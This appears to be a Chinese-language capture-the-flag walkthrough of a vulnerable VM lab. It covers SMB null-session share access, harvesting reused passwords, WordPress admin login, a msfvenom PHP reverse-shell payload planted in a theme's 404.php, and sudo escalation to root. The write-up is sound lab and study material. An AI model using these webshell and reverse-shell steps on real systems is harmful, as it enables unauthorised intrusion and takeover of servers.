環境
Kali ip 192.168.56.102
Smb 靶機ip 192.168.56.103 靶場下載:
鏈接:https://pan.baidu.com/s/1OwNjBf7ZEGmFlRq79bkD_A
提取碼:0eg6
信息探測
使用netdiscover -r ip/mask 進行內網網段存活ip探測
靶機為103
進行nmap端口探測和服務信息探測
nmap -sV -T4 -A 192.168.56.103
可以看到smb服務
針對SMB協議,使用空口令,若口令嘗試登陸,並查看敏感文件,下載查看
0x01針對於開放服務進行弱口令嘗試
smbclient -L 192.168.56.103
連接成功
分別查看三個共享連接是否有flag等敏感文件
smbclient ‘\\IP\$share’ 查看文件
嘗試到share$連接時 發現可以空口令連接
查看文件
Robots.txt里的目錄 每個查看后無果
查看deets.txt
發現一個密碼為12345
然后繼續查看敏感文件
Cd 到wordpress目錄
發現敏感文件wp-config.php
讀取到數據密碼
嘗試用數據庫密碼和12345登錄到Mysql ssh
均失敗
0x02針對於開放服務器的版本 嘗試溢出漏洞
嘗試searchsploit samba版本號 看看有沒有現成的溢出漏洞
嘗試過后無果
0x03針對於開放服務 進行深入信息探測
主機開放了80端口 針對於http服務 再次做信息探測
使用到的工具 dirb nikto owasp-zap進行目錄掃描 漏洞掃描
發現后台地址
http://192.168.56.103/wordpress/wp-admin/
嘗試使用我們得到的數據庫密碼和之前12345登錄
使用數據庫密碼登錄后台成功
后台程序為wordpress
想辦法上傳我們的webshell
0x04 webshell生成和上傳
使用msfvenom生成php反彈shell
msfvenom -p php/meterpreter/reverse_tcp lhost=攻擊機IP地址 lport=4444 -f raw > /root/Desktop/shell.php
后台上傳webshell
在后台的模版 可以直接插入我們的php代碼
我插入的404頁面的代碼
保存成功后 msf開始監聽反彈的shell
訪問靶機404.php 執行反彈shell
http://靶場IP/wordpress/wp-content/themes/twenty
Fifteen/404.php
拿到shell后 找到和flag有關的信息和文件
優化終端:
python -c "import pty; pty.spawn('/bin/bash')"
先查找用戶名: cat /etc/passwd
發現有個在home目錄下的togie 猜測是用戶名
-- su 用戶名
-- sudo –l
-- su sudo
嘗試切換到togie用戶 發現需要密碼 輸入之前得到的12345
切換成功
查看root可以執行哪些目錄的操作
sudo -l
發現有這些目錄
提升權限
Sudo su
root目錄下
最后成功拿到查看flag.txt 拿到flag
完畢。